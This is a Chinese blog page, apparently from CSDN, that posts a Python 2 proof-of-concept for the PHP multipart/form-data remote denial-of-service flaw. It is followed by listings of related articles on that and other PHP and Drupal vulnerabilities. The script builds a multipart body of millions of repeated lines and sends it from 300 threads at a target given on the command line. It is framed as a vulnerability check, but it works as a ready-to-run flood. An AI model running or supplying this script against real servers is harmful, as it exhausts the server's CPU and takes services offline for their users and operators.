php 远程dos漏洞,PHP multipart/form-data 远程DOS漏洞 POC

最新推荐文章于 2024-04-02 14:24:30 发布
最新推荐文章于 2024-04-02 14:24:30 发布
阅读量213 收藏
点赞数
文章标签: php 远程dos漏洞

import sys

import urllib,urllib2

import datetime

from optparse import OptionParser

import threading

import time

def http_proxy(proxy_url):

proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})

null_proxy_handler = urllib2.ProxyHandler({})

opener = urllib2.build_opener(proxy_handler)

urllib2.install_opener(opener)

#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):

req = urllib2.Request(url)

print "starts......"

for key in headers.keys():

req.add_header(key,headers[key])

starttime = datetime.datetime.now();

fd = urllib2.urlopen(req,post_body)

html = fd.read()

endtime = datetime.datetime.now()

usetime=(endtime - starttime).seconds

if(usetime > 5):

result = url+" is vulnerable";

else:

if(usetime > 3):

result = "need to check normal respond time"

return [result,usetime]

#end

def main():

#http_proxy("http://127.0.0.1:8089")

parser = OptionParser()

parser.add_option("-t", "--target", action="store",

dest="target",

default=False,

type="string",

help="test target")

(options, args) = parser.parse_args()

if(options.target):

target = options.target

else:

return;

Num=3500000

headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',

'Accept-Encoding':'gzip, deflate',

'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}

body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"

payload=""

for i in range(0,Num):

payload = payload + "a\n"

body = body + payload;

body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"

print "starting...";

for j in range(100):

for i in range(3):

t=threading.Thread(target=check_php_multipartform_dos,args=(target,body,headers,))

t.start()

time.sleep(0.01)

#respond=check_php_multipartform_dos(target,body,headers)

#print "Result : "

#print respond[0]

#print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":

main()

weixin_39845113
关注
Monitorr 任意文件上传漏洞复现(CVE-2024-0713)
0xSec
01-24 1349
Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)
qq_51577576的博客
02-18 593
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
PHP multipartform-data 远程DOS漏洞
06-25
验证PHP multipartform-data远程DOS漏洞,适用于绿盟扫描器直接扫出来的漏洞验证
PHP multipart/form-data 远程DOS漏洞
FFy's Blog
06-13 3905
0x00 摘要 PHP解析multipart/form-datahttp请求的body part请求头时,重复拷贝字符串导致DOS远程攻击者通过发送恶意构造的multipart/form-data请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。 影响范围: PHP所有版本 0x01 漏洞入口 PHP源码中main/ rfc1867.c负责解析multipart/for
PHPDOS, multipart/form-data 远程dos漏洞利用程序
08-01
该程序是 multipart/form-data 远程dos利用程序,一台电脑直接打崩一台服务器!程序只为便于检测你服务器漏洞,切勿非法使用。 检测效果不明显的话,多运行几个实例将会增强攻击力度。
php dos漏洞 测试,PHP multipart/form-data 远程DOS漏洞
weixin_39669629的博客
04-11 237
import sysimport urllib,urllib2import datetimefrom optparse import OptionParserdef http_proxy(proxy_url):proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})null_proxy_handler = urllib2.ProxyHan...
PHP multipart/form-data 远程DOS漏洞 针对centos 修补具体操作
weixin_30595035的博客
08-06 375
今天同事提醒 php 有这么一个漏洞multipart/form-data 远程DOS漏洞PHP Multipartform-data远程DOS攻击漏洞,恶意构造的请求会导致服务器的cpu使用率达到100%。全版本受影响,危害严重。请尽快修复漏洞。 原理网上也有很多,下面就只讲具体的操作,只针对centos 小白。 1.打开下面网址 https://webtatic.com/ne...
str2poc总结
lemonwei
04-09 366
看了很多文章的str2的漏洞集合 #Struts2-045 CVE-2017-5638 影响范围:Struts 2.3.5 – Struts 2.3.31,Struts 2.5 – Struts 2.5.10 触发条件:基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行 利用方法:构造Content-type的值 测试POC: %{(#nike='multipart/f...
wordpress js-support-ticket文件上传漏洞(含批量验证poc
最新发布
weixin_43567873的博客
04-02 314
wordpress js-support-ticket文件上传漏洞(含批量验证poc
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 916
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
phpbug69364-test:69364 PHP Multipartform-data远程dos漏洞
05-09
php-bug-69364-test CVE 2015-4024 , bug #69364 PHP Multipart/form-data remote dos Vulnerability WARNING: USE THIS TOOL AT YOUR OWN RISK 注意:此工具造成的任何后果由使用者自行承担 原理: 官方: 检测: Usage: python xxx.py -t "http://TARGET_URL" -x "THREAD" -r "REQUEST_LENGTH" Example: python xxx.py -t "" -x "100" -r "350000"
PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞.pdf
11-23
PHP安全问题:远程溢出、DoS、safe_mode绕过漏洞.pdf
浅谈“PHP multipart/form-data 远程DOS漏洞
→_→
08-09 1291
一:漏洞名称: PHP multipart/form-data 远程DOS漏洞 描述: PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5
PHP Multipart/form-data remote dos Vulnerability
weixin_30652897的博客
12-14 126
catalog 1. Description 2. Analysis 1. Description PHP is vulnerable to a remote denial of service, caused by repeatedly allocate memory、concatenate string、copy string and free memory when P...
PHP 远程 DoS 漏洞PHP Multipart/form-data remote dos Vulnerability)
risingsun001的专栏
05-20 2189
4 月 3 日,有人在 PHP 官网提交 PHP 远程 DoS 漏洞PHP Multipart/form-data remote dos Vulnerability),代号 69364①。由于该漏洞涉及 PHP 的所有版本,故其影响面较大,一经发布迅速引发多方面关注。14 日,各种 PoC 已经在网络上流传。
php5.6.31升级5.6.40(修复PHP multipart/form-data 远程DOS漏洞
bigwood99的博客
09-07 1170
php官网下载软件包。 https://www.php.net/downloads 下载页面默认是最新版内容,要找到较早的版本,在页面右侧找“Old archives ”,点击可以看到大量较早版本软件包。 软件包准备好,下一步就是准备编译安装。 为了确保新版php支持软件系统正常运作,需要了解旧版编译的参数。 使用如下命令获得: php -i 注意,建议在php旧版目录下执行。 之后,按照它编译新版php即可。编译成功,执行make && make install完.
解决multipart/form-data文件上传中的参数传递问题
在服务器端,如使用PHP、Node.js、Java或其他后端语言,需要解析`multipart/form-data`编码的数据。解析后的数据通常包含多个部分,每个部分都有自己的边界标识,以便于区分文件和文本数据。这样,服务器就可以分别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值